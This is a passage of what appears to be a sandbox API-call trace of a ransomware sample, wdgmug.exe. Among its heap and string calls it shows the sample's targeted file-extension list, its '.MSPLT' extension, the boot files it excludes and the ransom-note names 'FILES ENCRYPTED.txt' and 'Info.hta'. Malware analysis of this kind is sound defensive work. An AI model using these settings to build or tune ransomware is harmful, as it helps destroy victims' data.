[0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779208 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7790e8 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779178 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779088 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778fb0 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778fc8 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779238 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779100 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7791f0 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778fe0 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x779058 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x12) returned 0x725730 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7791c0 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778ff8 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779010 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779118 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7790a0 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779028 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779220 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7791a8 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778f68 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779040 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7790d0 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779190 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7790b8 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779130 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779148 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779160 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779b90 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779cf8 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779c50 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779d10 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x779ba8 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x779d28 [0158.044] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x779aa0 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xe) returned 0x779bd8 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x779d40 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x753320 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779d58 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x753340 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779c68 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779cb0 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779ce0 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x779a70 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x779c80 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779a88 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x779ad0 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779ae8 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779bc0 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x779bf0 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779ab8 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x779c38 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x779cc8 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779b00 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x7531e0 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779b18 [0158.045] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779b60 [0158.045] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755fd0, Size=0x800) returned 0x779f48 [0158.046] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0158.046] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x767720 | out: hHeap=0x710000) returned 1 [0158.046] lstrlenW (lpString="") returned 0 [0158.046] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x77abe8 | out: hHeap=0x710000) returned 1 [0158.046] lstrlenW (lpString=".MSPLT") returned 6 [0158.046] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x753360, Size=0x8) returned 0x753500 [0158.046] lstrlenW (lpString=".MSPLT") returned 6 [0158.046] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x77ab88 | out: hHeap=0x710000) returned 1 [0158.046] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x77aab0, Size=0x20) returned 0x74e8e0 [0158.046] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74e8e0, Size=0x40) returned 0x72a660 [0158.046] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a660, Size=0x80) returned 0x754160 [0158.046] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x753360, Size=0x8) returned 0x7533f0 [0158.046] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7533f0, Size=0x10) returned 0x77aae0 [0158.046] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x77aae0, Size=0x20) returned 0x74e7a0 [0158.046] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0158.046] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x754160 | out: hHeap=0x710000) returned 1 [0158.046] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x77ad50, Size=0x20) returned 0x74e8b8 [0158.046] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74e8b8, Size=0x40) returned 0x72a588 [0158.046] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19 [0158.046] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19 [0158.046] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x72a588 | out: hHeap=0x710000) returned 1 [0158.047] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x77ab88, Size=0x20) returned 0x74e7f0 [0158.047] lstrlenW (lpString="Info.hta") returned 8 [0158.047] lstrlenW (lpString="Info.hta") returned 8 [0158.047] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e7f0 | out: hHeap=0x710000) returned 1 [0158.047] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x77af58, nSize=0x7fff | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\wdgmug.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\wdgmug.exe")) returned 0x22 [0158.047] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x77af58 | out: hHeap=0x710000) returned 1 [0158.048] lstrlenW (lpString="wdgmug.exe") returned 10 [0158.048] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74e7a0, Size=0x40) returned 0x72a420 [0158.048] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x77aac8, Size=0x20) returned 0x74eb88 [0158.049] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x77ac78, Size=0x20) returned 0x74ec28 [0158.049] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74ec28, Size=0x40) returned 0x72a540 [0158.049] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a540, Size=0x80) returned 0x754380 [0158.049] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x754380, Size=0x100) returned 0x755fd0 [0158.049] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0158.049] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x755fd0 | out: hHeap=0x710000) returned 1 [0158.049] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x77af58, nSize=0x8000 | out: lpDst="C:\\WINDOWS;") returned 0xc [0158.050] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x78af60 | out: hHeap=0x710000) returned 1 [0158.050] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x77af58 | out: hHeap=0x710000) returned 1 [0158.051] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7533e0, Size=0x8) returned 0x753460 [0158.051] lstrlenW (lpString="%windir%;") returned 9 [0158.051] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74eb88 | out: hHeap=0x710000) returned 1 [0158.051] lstrlenW (lpString="C:\\WINDOWS;") returned 11 [0158.051] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x768728 | out: hHeap=0x710000) returned 1 [0158.051] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x77ac18, Size=0x20) returned 0x74e7a0 [0158.051] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74e7a0, Size=0x40) returned 0x72a660 [0158.052] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a660, Size=0x80) returned 0x7545a0 [0158.052] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7545a0, Size=0x100) returned 0x755fd0 [0158.052] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x753430, Size=0x8) returned 0x753440 [0158.052] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x753440, Size=0x10) returned 0x77aca8 [0158.052] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x77aca8, Size=0x20) returned 0x74ea20 [0158.052] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7533a0, Size=0x8) returned 0x753410 [0158.052] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x753400, Size=0x8) returned 0x7533d0 [0158.052] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7534f0, Size=0x8) returned 0x753420 [0158.052] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x753420, Size=0x10) returned 0x77aac8 [0158.052] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x77aac8, Size=0x20) returned 0x74eac0 [0158.052] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x753410, Size=0x10) returned 0x77ab58 [0158.052] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7533d0, Size=0x10) returned 0x77aca8 [0158.052] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7533d0, Size=0x8) returned 0x7534c0 [0158.052] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x753530, Size=0x8) returned 0x753540 [0158.052] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x77ab58, Size=0x20) returned 0x74eb60 [0158.052] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x77aca8, Size=0x20) returned 0x74eb10 [0158.052] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7534f0, Size=0x8) returned 0x753390 [0158.052] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0158.052] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x755fd0 | out: hHeap=0x710000) returned 1 [0158.052] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x77aca8, Size=0x20) returned 0x74eb88 [0158.053] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x767720, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0158.053] lstrlenW (lpString="C:\\") returned 3 [0158.053] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x19fca4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x19fca4*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0158.053] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x767720 | out: hHeap=0x710000) returned 1 [0158.054] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7533e0, Size=0x82) returned 0x756060 [0158.054] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x753470, Size=0x100) returned 0x7560f0 [0158.054] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x756060, Size=0x104) returned 0x756318 [0158.054] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7560f0, Size=0x200) returned 0x767720 [0158.055] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7561f8, Size=0x104) returned 0x756060 [0158.055] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7545a0, Size=0x100) returned 0x756170 [0158.056] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x753520 | out: hHeap=0x710000) returned 1 [0158.056] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x767720 | out: hHeap=0x710000) returned 1 [0158.056] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x77adb0 | out: hHeap=0x710000) returned 1 [0158.056] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x754848 | out: hHeap=0x710000) returned 1 [0158.056] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x77adc8 | out: hHeap=0x710000) returned 1 [0158.056] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x754d98 | out: hHeap=0x710000) returned 1 [0158.056] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x77aee8 | out: hHeap=0x710000) returned 1 [0158.056] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x756318 | out: hHeap=0x710000) returned 1 [0158.056] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x77ae10 | out: hHeap=0x710000) returned 1 [0158.056] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x756060 | out: hHeap=0x710000) returned 1 [0158.056] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x77aeb8 | out: hHeap=0x710000) returned 1 [0158.056] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x756288 | out: hHeap=0x710000) returned 1 [0158.056] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x77ae40 | out: hHeap=0x710000) returned 1 [0158.057] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x77ade0, Size=0x20) returned 0x74ea48 [0158.057] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74ea48, Size=0x40) returned 0x72a0c0 [0158.057] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x753480 | out: hHeap=0x710000) returned 1 [0158.057] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x77aca8 | out: hHeap=0x710000) returned 1 [0158.057] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x755fd0 | out: hHeap=0x710000) returned 1 [0158.057] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x77ae70 | out: hHeap=0x710000) returned 1 [0158.057] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x756170 | out: hHeap=0x710000) returned 1 [0158.057] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x77ad98 | out: hHeap=0x710000) returned 1 [0158.057] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7533d0 | out: hHeap=0x710000) returned 1 [0158.057] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x77aed0 | out: hHeap=0x710000) returned 1 [0158.057] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x726108 | out: hHeap=0x710000) returned 1 [0158.057] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7255d0 | out: hHeap=0x710000) returned 1 [0158.057] lstrlenW (lpString="%systemdrive%") returned 13 [0158.057] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74eb88 | out: hHeap=0x710000) returned 1 [0158.057] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x754518 | out: hHeap=0x710000) returned 1 [0158.057] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x753530 | out: hHeap=0x710000) returned 1 [0158.057] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x757700, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0158.059] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x77af00, Size=0x20) returned 0x74eae8 [0158.059] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74eae8, Size=0x40) returned 0x72a660 [0158.059] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a660, Size=0x80) returned 0x7546b0 [0158.059] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7546b0, Size=0x100) returned 0x755fd0 [0158.059] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755fd0, Size=0x200) returned 0x755fd0 [0158.059] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755fd0, Size=0x400) returned 0x755fd0 [0158.059] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755fd0, Size=0x800) returned 0x769728 [0158.059] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x769728, Size=0x1000) returned 0x769728 [0158.059] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x753470, Size=0x8) returned 0x753530 [0158.059] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x753530, Size=0x10) returned 0x77adb0 [0158.059] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x77adb0, Size=0x20) returned 0x74eae8 [0158.059] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74eae8, Size=0x40) returned 0x72a270 [0158.059] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a270, Size=0x80) returned 0x754490 [0158.059] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x754490, Size=0x100) returned 0x755fd0 [0158.059] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755fd0, Size=0x200) returned 0x755fd0 [0158.059] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755fd0, Size=0x400) returned 0x755fd0 [0158.060] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755fd0, Size=0x800) returned 0x79d398 [0158.060] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0158.060] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x769728 | out: hHeap=0x710000) returned 1 [0158.060] lstrlenW (lpString="") returned 0 [0158.060] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x79c5c8 | out: hHeap=0x710000) returned 1 [0158.060] lstrlenW (lpString=".MSPLT") returned 6 [0158.060] lstrlenW (lpString=".MSPLT") returned 6 [0158.060] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x79c790 | out: hHeap=0x710000) returned 1 [0158.060] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79c658, Size=0x20) returned 0x74e7f0 [0158.060] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74e7f0, Size=0x40) returned 0x72a270 [0158.060] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a270, Size=0x80) returned 0x754848 [0158.060] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79d170, Size=0x8) returned 0x79d090 [0158.060] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79d090, Size=0x10) returned 0x79c658 [0158.060] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79c658, Size=0x20) returned 0x74e8e0 [0158.060] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0158.060] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x754848 | out: hHeap=0x710000) returned 1 [0158.060] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79ca00, Size=0x20) returned 0x74eb88 [0158.060] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74eb88, Size=0x40) returned 0x72a270 [0158.061] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19 [0158.061] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19 [0158.061] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x72a270 | out: hHeap=0x710000) returned 1 [0158.061] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79cb50, Size=0x20) returned 0x74eb88 [0158.061] lstrlenW (lpString="Info.hta") returned 8 [0158.061] lstrlenW 